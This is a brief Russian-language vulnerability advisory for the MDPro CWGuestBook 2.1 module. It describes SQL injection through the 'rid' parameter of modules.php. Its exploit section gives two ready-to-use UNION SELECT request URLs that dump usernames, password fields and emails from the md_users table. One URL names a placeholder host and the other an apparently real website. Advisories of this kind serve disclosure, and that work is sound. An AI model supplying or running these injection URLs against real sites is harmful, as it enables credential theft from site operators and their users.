Программа: MDPro Module CWGuestBook 2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «rid» сценарием modules.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=
index&req=viewrecords&rid=-14 UNION SELECT
1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file= index&req=viewrecords&rid=-14
UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE
pn_uid=2--
